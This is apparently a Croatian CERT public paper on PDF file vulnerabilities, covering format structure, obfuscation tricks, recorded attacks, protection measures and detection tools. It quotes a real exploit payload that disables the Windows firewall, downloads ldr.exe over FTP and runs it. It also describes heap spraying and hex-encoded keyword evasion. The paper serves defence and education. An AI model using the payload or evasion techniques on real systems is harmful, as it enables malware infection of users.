Ranjivost PDF datoteka

Величина: px
Почињати приказ од странице:

Download "Ranjivost PDF datoteka"

Транскрипт

1

2 Sadržaj 1 UVOD O PDF FORMATU ELEMENTI I MOGUĆNOSTI PDF JEZIKA ALATI ZA RAD S PDF DATOTEKAMA STRUKTURA I JEZIK PDF-A RANJIVOSTI PDF-A DETALJNIJA ANALIZA STRUKTURE I JEZIKA PDF-A PDF KAO MALVER ZABILJEŽENI NAPADI ZAŠTITA OSNOVNE MJERE NAPREDNO OTKRIVANJE ZLOĆUDNIH DOKUMENATA ZAKLJUČAK LITERATURA...22 Ovaj dokument je vlasništvo Nacionalnog CERT a. Namijenjen je za javnu objavu, njime se može svatko koristiti, na njega se pozivati, ali samo u izvornom obliku, bez ikakvih izmjena, uz obavezno navođenje izvora podataka. Korištenje ovog dokumenta protivno gornjim navodima, povreda je autorskih prava CARNet a, sukladno Zakonu o autorskim pravima. Počinitelj takve aktivnosti podliježe kaznenoj odgovornosti koja je regulirana Kaznenim zakonom RH.

3 1 Uvod PDF, skraćeno od Portable Document Format, jedinstveni je format za razmjenu dokumenata kojeg je stvorila tvrtka Adobe godine. Dokument nastao na jednom računalu može se čitati na drugom, bez obzira na njihove operativne sustave i vrstu (stolno računalo, ručno računalo ili mobilni uređaj). Na prvi pogled, ovo se ne čini kao tako posebno svojstvo jer i druge aplikacije kao npr. Microsoft Word i Excel imaju svoje alternative na drugim platformama koje omogućuju čitanje njihovih dokumenata. Ono što čini PDF toliko posebnim je očuvanje sadržaja (integriteta) dokumenta koji je često važniji od same mogućnosti čitanja. Pretpostavimo da imamo dokument napisan u Microsoft Wordu na Windows operativnom sustavu u kojem se koriste generički fontovi za Windows aplikacije. Nakon što se taj dokument pretvori u PDF, može se pogledati i otisnuti sa očuvanim fontovima i grafikom na bilo kojoj platformi bez da ona posjeduje te fontove, grafiku i originalnu aplikaciju pomoću koje je nastao taj PDF dokument. Tako npr. ova činjenica tvrtkama eliminira potrebu za instalacijom jednakog paketa softvera u svim svojim odjelima, odnosno računalima. Ogromnu popularnost PDF format upravo zahvaljuje ovom svojstvu. Od godine PDF je postao otvoreni standard objavljen od svjetske organizacije za standardizaciju ISO (ISO/IEC :2008), dok je do tad Adobe posjedovao njegovu specifikaciju. Upravo ta popularnost i velik broj otkrivenih ranjivosti u softveru i propusta u samom jeziku kojeg PDF koristi za prikaz dokumenata, pogodovali su razvoju zloćudnog softvera koji koristi taj format.

4 2 O PDF formatu 2.1 Elementi i mogućnosti PDF jezika Specifikacija PDF jezika mnogo je složenija nego što se misli. Od nastanka, sa svakom novom verzijom, Adobe je dodavao nove mogućnosti. Posljednja inačica PDF-a je 1.7. Slika 2-1: logo PDF-a Svaka PDF datoteka sastoji se od niza objekata koji zajedno opisuju izgled jedne ili više stranica, obično uz dodatne interaktivne elemente i podatke sa višeg aplikacijskog sloja. Dokument može sadržavati bilo kakvu kombinaciju teksta, grafike i slika. Izgled stranice opisuje slijed sadržaja (content stream) koji uključuje niz grafičkih objekata. Podržani su i interaktivni elementi kao što su tekstualne zabilješke (text notes), poveznice (linkovi), zvukovi, video zapisi itd. Nadalje, PDF objekti mogu definirati okidače koji reagiraju i pokreću akcije kada korisnik pritisne određenu tipku na tipkovnici ili mišu itd. Tu su još i interaktivne forme, odnosno polja čije vrijednosti može korisnika prenijeti u drugu ili učitati iz druge aplikacije. Postoji osam vrsta objekata, a to su: boolean brojevi nizovi znakova (stringovi) imena nizovi objekata rječnici, odnosno kolekcija objekata indeksiranih imenima stream, obično sadrže veliku količinu podataka null objekt

5 Način na koji PDF format definira grafiku vrlo je sličan jeziku PostScript, a koristi Kartezijev koordinatni sustav, koji je neovisan o korištenoj platformi, za opis površine stranice. Opis stranice može koristiti matricu kako bi se grafičkom elementu mijenjala veličina, kako bi se okretao ili rotirao. Grafička stanja su kolekcija od 24 parametra (od PDF verzije 1.6) koja se mogu mijenjati, spremati i nanovo vraćati. Grafički model omogućuje da: figure budu u obliku znakova (glyph), linija, geometrijskom obliku ili da budu uzorak neke slike, odnosno digitalne fotografije figure mogu biti obojene, crne, bijele ili u bilo kojoj nijansi sive boje, a mogu biti i uzorak koji se ponavlja ili lagani prijelaz između različitih boja bilo koji od elemenata može biti zakačen (engl. clipped) na neki drugi oblik, tako da se prikazuje unutar njih Od verzije 1.3 u PDF je uvedena mogućnost dodavanja JavaScript koda. Tako se JavaScript kodom može utjecati na izgled stranica, podatke u poljima, na forme. Uz to, na izvršavanje koda može utjecati i neka akcija korisnika npr. samo otvaranje dokumenta. PDF posjeduje dvije mogućnosti za sigurnost svojih dokumenata. One se mogu koristiti posebno ili zajedno, odnosno obadvije istovremeno. To su: enkripcija dokument može biti kriptiran tako da ga samo autorizirani korisnici mogu otvoriti; postoji posebna autorizacija za autora dokumenta i za sve ostale; pristup korisnicima može biti i selektivno ograničen tako da oni mogu samo raditi samo određene operacije, npr. uređivanje, ispisivanje i dr. dokument može biti digitalno potpisan radi potvrde autentičnosti; potpis može biti u više oblika npr. sažetak dokumenta kriptiran privatnim ključem, biometrički potpis otiskom prsta itd.; bilo kakva promjena dokumenta čini potpis nevažećim

6 2.2 Alati za rad s PDF datotekama Tvrtka Adobe, kao izumitelj i bivši vlasnik specifikacija PDF-a je naravno najzastupljenija na tržištu alata. Njeni aktualni alati su (počevši od onog sa najmanje mogućnosti): Reader 9 besplatan, omogućuje pregledavanje, ispis i pretraživanje PDF dokumenata; u novoj verziji moguće je i ispunjavati formulare, ali podaci iz njih ne mogu se spremiti osim ako formulari nemaju dodijeljena specijalna prava za korisnike Readera; podaci iz formulara prosljeđuju se putem tipki preko elektroničke pošte ili slanjem na Web poslužitelj. Slika 2-2 prikazuje izgled sučelja Adobe Readera. Acrobat Standard 9 (samo za Windows operativne sustave) omogućuje stvaranje formi sa objektima, JavaScript kodom i skupljanje podataka sa njih; ne pruža dodatne (profesionalne) opcije za ispisivanje; ne uključuje alate za redakciju; ne može stvoriti indeksnu datoteku; podržava manje formata koji se mogu pretvoriti u PDF od Pro inačice Acrobat Pro podržava one opcije za koje je prethodno navedeno da ih Standard inačica ne podržava Acrobat Pro Extended podržava sve ono što i Pro inačice uz dodatak nekoliko drugih mogućnosti većinom vezanih uz rad sa multimedijom Ostali popularni alati: Foxit Reader i ostali alati iste tvrtke Evince Sumatra PDF Nitro PDF i dr.

7 Slika 2-2: sučelje Adobe Readera 2.3 Struktura i jezik PDF-a Struktura PDF-a sastoji se od zaglavlja koje sadrži verziju PDF-a koja se koristi (npr. %PDF- 1.1.), liste objekata, povratne reference (cross reference) i završnog dijela sa završnom oznakom (%%EOF). Pojednostavljena struktura PDF dokumenta izgleda ovako:

8 ZAGLAVLJE %PDF-[inačica] HIJERARHIJA OBJEKATA POVRATNA REFERENCA ZAVRŠNI DIO %%EOF Format oznake za objekt (obj taga) je: [objnum] [genid] obj (value) endobj Gdje su: [objnum] redni broj objekta obj, endobj ključne riječi [genid] identifikator verzije objekta koji sa objnum čini jedinstvenu oznaku objekta kojim se može referencirati (value) vrijednosti u objektu (vrsta fonta, akcije itd.)

9 Objekti su u hijerarhijskom odnosu roditelj-djeca. Povratna referenca služi za referenciranje objekata i sadrži njihove adrese u bajtovima u odnosu na početak dokumenta. Inače, PDF jezik je case-sensitive, odnosno razlikuje je li nešto napisano malim ili velikim slovom.

10 3 Ranjivosti PDF-a Pravila za leksičko izražavanje u PDF specifikaciji vrlo su labava i time otvaraju mogućnost napadačima da prikriju zloćudni kod. Naime, isti simbol moguće je napisati na više različitih načina i time izbjeći detekciju antivirusnim programima ili sustavima za detekciju upada. Svaki znak može se napisati heksadecimalnim ASCII kodom tako da npr. /Java#53cript je isto što i /JavaScript (53 je ASCII kod malog slova s). Zasad je velika većina pronađenih ranjivosti vezana uz: JavaScript dodatne mogućnosti (mailto, /Launch) vanjske programske biblioteke (Flash) formate i filtre za kodiranje, odnosno kompresiju (FlateDecode) U nekoliko slučajeva, napadači su koristili propuste PDF-a kod kompresije (zlib) i filtera za slike (FlateDecode i ASCII85Decode) kako bi prekrili zloćudan kod unutar PDF-a. Druga vrsta malvera koristi JavaScript u PDF-u kako bi se izvršile zloćudne procesorske naredbe. Nadalje, Didier Stevens upozorava [6] na /Launch /Action naredbu PDF-a koja omogućuje pokretanje bilo koje izvršne datoteke na računalu korisnika. Adobe Reader pri pokretanju takve naredbe upozorava korisnika i pita ga je li siguran da to želi, no tu je poruku Stevens uspio djelomično izmijeniti te je korisnika moguće socijalnim inženjeringom navesti da potvrdi akciju. Drugi popularni čitač PDF datoteka Foxit Reader čak niti ne upozorava korisnika. Nadogradnja softvera ne uklanja propust jer je zapravo riječ o ranjivost samog PDF jezika. Naime, spomenuta akcija Launch, kako je tako definirano u specifikaciji PDF-a, koristi ShellExecute funkciju operativnog sustava Windows. Zahvaćena su oba najpopularnija Microsoftova operativna sustava Windows XP sa SP3 i Windows 7. Stevens nije želio otkriti točno kojom metodom je ovo uspio. Također, Stevens je primijetio [3] kako se objekti u PDF dokumentu mogu definirati bilo kojim redoslijedom, tako da se logička struktura ne mijenja, za razliku od fizičke. Za primjer, sa samo 7 objekata moguće je izraditi 5020 različitih fizičkih struktura i to samo mijenjajući raspored objekata. Iz svega navedenog vidimo kako jezik PDF-a ima u svojim temeljima neke ranjivosti, tako da je moguće proizvesti zloćudni kod koji koristi ranjivost jezika, a ne softversku ranjivost, što može

11 biti vrlo opasno. Druga bitna stvar je iznimno velika zastupljenost PDF datoteka na Web stranicama i to tako da se one automatski pokreću unutar Web preglednika. Ovo može biti jako opasno, posebno ako korisnik nema dovoljno dobro podešenu sigurnost unutar Web preglednika i slijepo vjeruje bilo kakvom sadržaju. 3.1 Detaljnija analiza strukture i jezika PDF-a Kako bismo mogli ući u srž problematičnih mogućnosti koje format PDF-a pruža napadačima, potrebno je podrobnije upoznati jezik i način na koji su strukturirani PDF dokumenti. Navedimo primjer koda jednog cijelog dokumenta: %PDF obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R >> endobj 2 0 obj << /Type /Outlines /Count 0 >> endobj 3 0 obj << /Type /Pages /Kids [4 0 R] /Count 1 >> endobj 4 0 obj << /Type /Page /Parent 3 0 R /MediaBox [ ] /Contents 5 0 R /Resources << /ProcSet [/PDF /Text] /Font << /F1 6 0 R >> >>

12 endobj 5 0 obj stream BT /F1 24 Tf Td (Hello World) Tj ET endstream endobj 6 0 obj << /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica /Encoding /MacRomanEncoding >> endobj xref f n n n n n n trailer << /Size 7 /Root 1 0 R >> startxref 644 %%EOF Pogledajmo prvi objekt: zapravo je riječ o indirektnom objektu jer ima broj pa se prema tome može referencirati. Objekt je tipa Catalog i riječ je o rječniku koji počinje i završava oznakama << i >>. U njemu su 2 0 R i 3 0 R reference na indirektne objekte 2 i 3. Objekt 2 opisuje crteže (nema ih) dok 3 opisuje stranice. Umjesto referenciranja objekata, u objekt 1 mogao se ubaciti cijeli objekt. U tom se slučaju, na mjestu gdje sada stoji referenca 2 0 R, ubaci objekt 2 uključujući znakove << i >> (to bi onda bio direktni objekt). Element kids u objektu 3 predstavlja listu stranica navedenu u uglatim zagradama. Ovdje imamo samo jednu stranicu koju predstavlja objekt 4 (oznaka 4 0 R).

13 Objekt 4 definira sadržaj (točnije gdje se on nalazi), resurse koji će koristiti za renderiranje i veličinu stranice. MediaBox predstavlja veličinu stranice, dok se sadržaj nalazi u objektu 5. Font je definiran u objektu 6. Objekt u kojem se nalazi sadržaj je specijalnog tipa stream object. Svrha ovog tipa objekta je da omogući korištenje raznih vrsta kodiranja (koji se zovu filteri u PDF jeziku) poput kompresije Zlib Flatedecode. Sadržaj takvog objekta je niz instrukcija za grafičko oblikovanje teksta koji započinje sa BT i završava za ET. U našem primjeru to su instrukcije: koristi font F1 veličine 24 idi na poziciju (100, 700) nacrtaj tekst Hello World Osim svega dosad, alatu za čitanje PDF dokumenta su potrebne još neke informacije. Treba znati koji objekt započinje opis dokumenta i indeks svakog objekta. Indeks objekta je povratna referenca (cross reference) oznake xref koja definira broj, verziju i apsolutnu poziciju objekta u datoteci. U našem primjeru nakon xref imamo 0 (broj prvog objekta) i 7 (veličinu xref tablice). Prvi indeks mora početi objektom broja 0 i verzije Broj 12 u drugoj liniji tablice znači da objekt 1 počinje nakon 12 bajtova datoteke, verzije je 0 (drugi stupac). Slovo n u trećem stupcu znači da se objekt koristi (ako imamo f, tada je objekt slobodan). Na kraju pod trailer se specifira koji je korijenski (root) objekt. 644 je apsolutna pozicija xref u PDF datoteci. 3.2 PDF kao malver Godišnji izvještaj o globalnim prijetnjama za (Annual Global Threat Report) kojeg izdaje tvrtka ScanSafe (dio telekomunikacijskog diva Cisco) pokazuje da je tijekom godine broj napada u kojima su korišteni zloćudni Adobe PDF dokumenti skočio sa 56% na 80% sveukupnih napada ciljanih na softver tvrtke Adobe. Taj se izvještaj inače temelji na najvećoj svjetskoj analizi realnog Internet prometa, točnije trilijunu zahtjeva za Web stranicama. Sigurnosna tvrkta F-Secure prošle je godine izvjestila [6] kako je tijekom broj napada vezanih uz datoteke Adobeovog Readera pretekao one vezane uz Microsoft Word. Na sljedećoj stranici imamo grafičke prikaze udjela napada prema različitim formatima u 2008., odnosno godini.

14 Slika 3-1: udio napada na PDF u usporedbi sa ostalim formatima u i (izvor: F-Secure)

15 Prema tvrtki McAffee [8], u prvoj četvrtini 2010., PDF datoteke čine 28% svog malvera vezanog uz zloupotrebu softvera, dok je taj broj tijekom i bio manji od 2%, a tijekom %: Slika 3-2: udjeli pronađenih zloupotreba (izvor: McAffe AvertLabs) Ovo potvrđuje da su napadači prepoznali PDF kao plodno tlo za svoje zlonamjerne radnje i dokazuje da je velik broj otkrivenih ranjivosti pogodovao većom iskorištavanju istih. S druge strane, ova činjenica je i rezultat toga da po istraživanju iz kolovoza 2009., čak 83.5% korisnika ne vrši redovite nadogradnje Adobeovih alata za rad sa PDF dokumentima. Napadači su svjesni činjenice da veći broj ranjivosti znači veću šansu za uspješnu infekciju. 3.3 Zabilježeni napadi Većina napada usmjerena je prema tome da se, kad korisnik otvori zloćudni PDF, pokrene novi proces, odnosno trojanski konj koji tako zarazi korisnikovo računalo. U srpnju godine zabilježeno je da napadači šire neželjene poruke elektroničke pošte (spam) s PDF dokumentima u privitku koji koriste tehnike zaštite PDF formata (enkripciju) kako bi otežali anti-virusnim alatima detekciju zloćudnog koda.

16 U rujnu godine otkrivena je ranjivost alata Adobe Reader i Acrobat (CVE ) koja je zahvaćala sve varijante alata verzija 8.1 i starijih te i starijih. Propust je omogućavao zloćudnom kodu da isključi Windows firewall, FTP-om preuzme crva i onda ga pokrene. Zloćudni PDF se širio om u privitku i bilo ga je dovoljno otvoriti da biste se zarazili. Zloćudni kod je sadržavao obj tag te je izgledao ovako: obj<</uri(mailto :%/../../../../../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o >1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/s/ URI> Tijekom mnogi zloćudni PDF dokumenti su koristili ranjivost JavaScript metode util.printf kako bi pokrenuli zloćudni kod iz memorije. Riječ je bilo o Adobe Readeru na Windows XP SP2. Krajem pojavila se naprednija vrsta zloćudnog PDF dokumenta istog tipa koji je koristio ranije zabilježenu ranjivost (CVE ) koristeći zloćudni JavaScript kod. Kao i mnoge ranije zloupotrebe tog tipa koristio je tehniku pretrpavanja memorije kako bi se kod izvršio točno na određenom dijelu memorije. To se izvodi gomilanjem NOP (No OPeration) naredbi procesoru. U ovom slučaju je riječ o nizu SBB (oduzimanje s posudbom) instrukcija koje imaju istu funkciju. Kod za pristup ljusci podijeljen je na dvije razine, što ovaj slučaj čini naprednijim od drugih. Naime, drugi dio koda je spremljen u drugom objektu, potpuno neovisno o prvom dijelu i on se izvršava (i postavlja u memoriju) iako dekompresija dokumenta ne uspijeva jer je PDF kod pogrešan. Tada, prvi dio koda pronalazi drugi dio u memoriji i prepušta mu daljnje izvođenje. Nakon toga, kod obrađuje ime PDF datoteke iz komandne linije i otvara je direktno, a sve zbog toga što ta PDF datoteka u sebi ima skrivene dvije izvršne datoteke (.exe). Prva pokušava dohvatiti zloćudni sadržaj sa mreže, dok druga otvara zloćudnu datoteku baby.pdf, kako korisnik ne bi primijetio da mu se prethodno srušio Adobe Reader. Na ovaj način napadač dobije potpunu kontrolu nad računalom korisnika. U travnju pojavio se zloćudni PDF dokument koji je u sebi sadržavao učahureni objekt kodiran korištenjem filtera Flatedecode i ASCII85Decode, a taj je objekt zapravo predstavljao XML datoteku koja u sebi nosi zloćudnu datoteku formata TIFF (Tagged Image File Format).

17 Malver je koristio dvije ranjivosti PDF-a: jednu vezanu uz JavaScript i drugu uz TIFF (CVE ). U lipnju zabilježeno je kako napadači koriste ranjivost authplay.dll datoteke koja dolazi uz svaku kopiju alata Adobe Reader i Acrobat te predstavlja prevoditelja za Adobe Flash sadržaj u PDF dokumentima. Napadači su u PDF dokumente postavljali zloćudni Flash sadržaj (stream). Propust je pogađao verzije 9 Adobeovih alata i to na operativnim sustavima Windows, Linux i Solaris. Ovaj propust su sigurnosne tvrtke kao Secunia ocijenile ekstremno kritičnim jer napadaču dozvoljava da preuzme kontrolu nad računalom napadnutog.

18 4 Zaštita 4.1 Osnovne mjere Mjere zaštite koje ćemo navesti ovdje ne osiguravaju apsolutnu zaštitu, ali uvelike pridonose sigurnosti. Kao i uvijek, vjerojatno najvažnija mjera zaštite je procjena može li se vjerovati sadržaju kojeg otvaramo, odnosno dolazi li on iz pouzdanog izvora, bio to ili neka web stranica. Najsigurnije je uvijek imati nadograđen PDF alat na zadnju dostupnu inačicu. Ali to često nije dovoljno, pogotovo u slučaju PDF-a. Potrebno je pratiti preporuke proizvođača jer je čest slučaj da proizvođač tek treba izdati zakrpu za neku ranjivost svojih alata (koja se već iskorištava), no zato postoji neko privremeno rješenje. Kod nekih slučajeva pomaže isključivanje podrške za JavaScript u PDF čitaču. U Adobe Readeru to se radi ovako: Edit -> Preferences -> JavaScript i maknuti kvačicu sa Enable Acrobat JavaScript Ostale mjere zaštite: korištenje najnovijeg anti-virusnog softvera, iako je praksa pokazala da oni prepoznaju samo manji dio malvera vezanog uz PDF isključivanje automatskog prikaza PDF dokumenata unutar Web preglednika; ako dokument prije otvaranja pohranimo na tvrdi disk, anti-virusni softver ima veću šansu otkriti zloćudan sadržaj korištenje alternativnog čitača umjesto Adobe Readera; napadači su se koncentrirali na ovaj alat zbog njegove popularnosti i mnogi napadi ne pogađaju alternativne alate (naravno to se ne odnosi na one koji koriste propuste u PDF specifikaciji) 4.2 Napredno otkrivanje zloćudnih dokumenata Stevens je u programskom jeziku Pyton razvio nekoliko alata za automatiziranu analizu PDF datoteka [4] koji pomažu kod utvrđivanja je li neka datoteka zloćudna. Analizu je potrebno

19 provoditi u sigurnim uvjetima, odnosno laboratoriju i to u Linux okruženju jer je velika većina napada ciljana na operativni sustav Windows. Prvi alat je PDFiD. Riječ je o specijaliziranom alatu za pretragu stringova koji traži određene ključne riječi i koristi metode kojima otkriva prikriveni kod (heksadecimalne znakove zna zamijeniti kako bi prepoznao kod). Nakon što neku sumnjivu PDF datoteku provučemo kroz ovaj alat, vidimo određene karakteristike dokumenta (verzija PDF-a, broj stranica) i ono najvažnije koliko puta se pojavljuje koja ključna riječ. Tabela 4-1: parametri alata PDFiD i njihova značenja s obzirom na sigurnost parametar / ključna riječ značenje obj, endobj broj ovih ključnih riječi govori nam koliko stream, endstream indirektnih objekata imamo u dokumentu xref, trailer, startref više od jednog pojavljivanja ovih ključnih riječi znači da postoji ulančano izvršavanje /Page broj stranica koliko dokument ima; Stevens [4] primjećuje da većina zloćudnih dokumenata ima jednu stranicu /Encrypt pokazuje da li je dokument kriptiran, to je jedna od metoda prikrivanja zloćudnog koda /ObjStm object stream je vrsta indirektnog objekta koji sadrži druge indirektne objekte; ako je unutar njega komprimiran JavaScript kod, ovaj alat ga neće otkriti /JavaScript, /JS nepostojanje ovih ključni riječi ne znači da u dokumentu nema JavaScript koda jer on može biti skriven u object streamu (/ObjStm) /RichMedia pokazuje da li postoji Flash sadržaj /AA, /OpenAction, /AcroForm da li postoje akcije kao što je npr. pokretanje JavaScript koda pri otvaranju dokumenta /JBIG2Decode postojanje JBIG2 formata slike u dokumentu, uz koji je vezana zabilježena ranjivost u Adobe alatima

20 Tablica 4-1 daje pregled izlaznih parametara alata PDFiD (od kojih su većina ključne riječi) i njihovih značenja u usporedbi sa vrijednostima, odnosno potencijalnu opasnost. PDFiD nudi i neke dodatne opcije kao što je računanje entropije dokumenta. Normalno je da imamo velike vrijednosti u stream objektima, a niske izvan njih. Ovaj alat ne kaže nam je li neki dokument zloćudan ili ne, samo nam pomaže u zaključivanju. Online verzija alata dostupna je na web stranici VirusTotal.com, portalu za skeniranje sumnjivih dokumenata. Drugi alat je pdf-parser, koji za razliku od PDFiDa posjeduje znanje o strukturi PDF dokumenata te može prepoznavati indirektne objekte, a također i dekomprimirati (koristiti filtre) kako bi npr. otkrio skriveni JavaScript kod u objektu tipa object stream. Analiza ovim alatom zahtijeva dosta vremena i poznavanje tehnika postavljanja zloćudnog koda u PDF, ranije spomenutih u ovom dokumentu. Oba alata dostupna su na blogu Didiera Stevensa [5].

21 5 Zaključak Kao što smo vidjeli, broj napada putem PDF dokumenata se u zadnje vrijeme drastično povećao. Otkriven je zaista velik broj ranjivosti alata za rad s tim formatom i ako tu uračunamo iznimno veliku popularnost, riječ je o ozbiljnoj prijetnji sigurnosti. Prosječni korisnik treba biti vrlo oprezan kod otvaranja dokumenata i držati se svih navedenih mjera zaštite. Jezik PDF-a sam po sebi sadrži neke propuste koje napadači mogu koristiti, tako da je jedno od rješenja definiranje nove specifikacije jezika. Trenutno je verzija 2.0 u razvoju. Adobe će, kao tvtka najviše pogođena napadima, u budućnosti sigurno više pažnje posvetiti sigurnosti i što bržem ispravljanju propusta. Očekuje se pojava novih, sve naprednijih napada, tako da je najvažnije pravovremeno informirrati korisnike.

22 6 Literatura 1. PDF Reference, Sixth Edition, Version 1.7, Adobe Systems Inc., studeni About the Physical and Logical Structure of PDF Files, Didier Stevens, travanj D. Stevens: Anatomy of Malicious PDF Documents Part One, magazin Hackin9, izdanje 3/ D. Stevens: Anatomy of Malicious PDF Documents Part Two, magazin Hackin9, izdanje 6/ PDF Tools 6. PDF Most Common File Type in Targeted Attacks, Didier Stevens, ožujak T. Padova: Adobe Acrobat 9 PDF Bible, 2009.

PDF = Potencijalno destruktivan fajl

PDF = Potencijalno destruktivan fajl PDF = Potencijalno Destruktivan Fajl Filip Vlašić, NCERT Sadržaj O PDF formatu Struktura PDF dokumenta Rizici Ranjivosti Exploit - primjeri Zaštita O PDF formatu Portable Document Format, nastao 1993.

Више

Recuva CERT.hr-PUBDOC

Recuva CERT.hr-PUBDOC Recuva CERT.hr-PUBDOC-2019-5-379 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA RECUVA... 4 3 KORIŠTENJE ALATA RECUVA... 7 4 ZAKLJUČAK... 13 Ovaj dokument izradio je Laboratorij za sustave i signale Zavoda za

Више

Microsoft Word - CCERT-PUBDOC doc

Microsoft Word - CCERT-PUBDOC doc Analiza Qchain programskog paketa CCERT-PUBDOC-2003-02-04 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada ovaj

Више

PuTTY CERT.hr-PUBDOC

PuTTY CERT.hr-PUBDOC PuTTY CERT.hr-PUBDOC-2018-12-371 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA PUTTY... 4 3 KORIŠTENJE ALATA PUTTY... 7 3.1 POVEZIVANJE S UDALJENIM RAČUNALOM... 7 3.2 POHRANA PROFILA KORISNIČKIH SJEDNICA...

Више

Microsoft Word - KORISNIČKA UPUTA za pripremu računala za rad s Fina potpisnim modulom_RSV_ doc

Microsoft Word - KORISNIČKA UPUTA za pripremu računala za rad s Fina potpisnim modulom_RSV_ doc Uputa za pripremu računala za rad s Fininim potpisnim modulom Zagreb, lipanj 2019. Sadržaj: 1. UVOD... 3 2. POJMOVI I SKRAĆENICE... 3 3. TEHNIČKI PREDUVJETI KORIŠTENJA... 3 4. PODEŠAVANJE INTERNET PREGLEDNIKA

Више

SVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA Seminarski rad u okviru predmeta Računalna forenzika BETTER PORTABLE GRAPHICS FORMAT Matej

SVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA Seminarski rad u okviru predmeta Računalna forenzika BETTER PORTABLE GRAPHICS FORMAT Matej SVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA Seminarski rad u okviru predmeta Računalna forenzika BETTER PORTABLE GRAPHICS FORMAT Matej Crnac Zagreb, siječanj 2018 Sadržaj Uvod 2 BPG format

Више

REPUBLIKA HRVATSKA MINISTARSTVO PRAVOSUĐA Korisničke upute e-građani aplikacije za elektronsko izdavanje posebnog uvjerenja iz kaznene evidencije Zagr

REPUBLIKA HRVATSKA MINISTARSTVO PRAVOSUĐA Korisničke upute e-građani aplikacije za elektronsko izdavanje posebnog uvjerenja iz kaznene evidencije Zagr REPUBLIKA HRVATSKA MINISTARSTVO PRAVOSUĐA e-građani aplikacije za elektronsko izdavanje posebnog uvjerenja iz kaznene evidencije Zagreb, 10. travnja 2017. Sadržaj 1 UVOD... 3 2 PRIJAVA U SUSTAV E-GRAĐANI...

Више

8 2 upiti_izvjesca.indd

8 2 upiti_izvjesca.indd 1 2. Baze podataka Upiti i izvješća baze podataka Na početku cjeline o bazama podataka napravili ste plošnu bazu podataka o natjecanjima učenika. Sada ćete izraditi relacijsku bazu u Accessu o učenicima

Више

KORISNIČKE UPUTE APLIKACIJA ZA POTPIS DATOTEKA

KORISNIČKE UPUTE APLIKACIJA ZA POTPIS DATOTEKA KORISNIČKE UPUTE APLIKACIJA ZA POTPIS DATOTEKA SADRŽAJ 1. UVOD... 3 1.1. Cilj i svrha... 3 1.2. Područje primjene... 3 2. POJMOVI I SKRAĆENICE... 4 3. PREDUVJETI KORIŠTENJA... 5 4. PREGLED APLIKACIJE...

Више

OpenDNS Family Shield CERT.hr-PUBDOC

OpenDNS Family Shield CERT.hr-PUBDOC OpenDNS Family Shield CERT.hr-PUBDOC-2019-6-381 Sadržaj 1 UVOD... 3 2 INSTALACIJA USLUGE OPENDNS FAMILY SHIELD... 5 2.1 KONFIGURACIJA NA OPERACIJSKOM SUSTAVU WINDOWS 10... 5 2.2 KONFIGURACIJA NA KUĆNOM/UREDSKOM

Више

Microsoft PowerPoint - podatkovni promet za objavu.pptx

Microsoft PowerPoint - podatkovni promet za objavu.pptx 1 2 3 Što je složaj protokola (protocol suite)? Pojedini protokol se odnosi samo na jedno pitanje koje omogućava komunikaciju. Kada se kombinira više protokola, grupa protokola koja je rezultat takve kombinacije

Више

OpenVPN GUI CERT.hr-PUBDOC

OpenVPN GUI CERT.hr-PUBDOC OpenVPN GUI CERT.hr-PUBDOC-2019-7-384 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA OPENVPN GUI... 5 3 KORIŠTENJE ALATA OPENVPN GUI... 17 4 ZAKLJUČAK... 27 Ovaj dokument izradio je Laboratorij za sustave i signale

Више

kriteriji ocjenjivanja - informatika 8

kriteriji ocjenjivanja - informatika 8 8. razred Nastavne cjeline: 1. Osnove informatike 2. Pohranjivanje multimedijalnih sadržaja, obrada zvuka 3. Baze podataka - MS Access 4. Izrada prezentacije 5. Timska izrada web stranice 6. Kritički odnos

Више

Slide 1

Slide 1 predmet Inženjerska informatika Operativni sistem dr Anica Milošević Koji operativni sistemi postoje? Microsoft Windows Linux Suse Red Hat Ubuntu Unix 26.1.2018. 2 Šta je Windows operativni sistem? Operativni

Више

23. siječnja od 13:00 do 14:00 Školsko natjecanje / Osnove informatike Srednje škole RJEŠENJA ZADATAKA S OBJAŠNJENJIMA Sponzori Medijski pokrovi

23. siječnja od 13:00 do 14:00 Školsko natjecanje / Osnove informatike Srednje škole RJEŠENJA ZADATAKA S OBJAŠNJENJIMA Sponzori Medijski pokrovi 3. siječnja 0. od 3:00 do 4:00 RJEŠENJA ZADATAKA S OBJAŠNJENJIMA Sponzori Medijski pokrovitelji Sadržaj Zadaci. 4.... Zadaci 5. 0.... 3 od 8 Zadaci. 4. U sljedećim pitanjima na pitanja odgovaraš upisivanjem

Више

Korice copy

Korice copy Sadržaj Softver... 2 Softveri za zaštitu... 2 Važnost podešavanja i ažuriranja operativnog sistema i aplikacija... 2 Korištenje korisničkog računa sa smanjenim privilegijama (limited user account)... 2

Више

Microsoft Word - 6. RAZRED INFORMATIKA.doc

Microsoft Word - 6. RAZRED INFORMATIKA.doc Kriteriji ocjenjivanja i vrednovanja INFORMATIKA - 6. razred Nastavne cjeline: 1. Život na mreži 2. Pletemo mreže, prenosimo, štitimo, pohranjujemo i organiziramo podatke 3. Računalno razmišljanje i programiranje

Више

Microsoft Word - privitak prijedloga odluke

Microsoft Word - privitak prijedloga odluke Informatički sustav za prikupljanje, simulaciju i prikaz podataka o cijenama javnih komunikacijskih usluga (dalje: Sustav e-tarife) Zagreb, HRVATSKA AGENCIJA ZA POŠTU I ELEKTRONIČKE KOMUNIKACIJE Roberta

Више

NIAS Projekt e-građani KORISNIČKA UPUTA za aplikaciju NIAS Verzija 1.1 Zagreb, srpanj 2014.

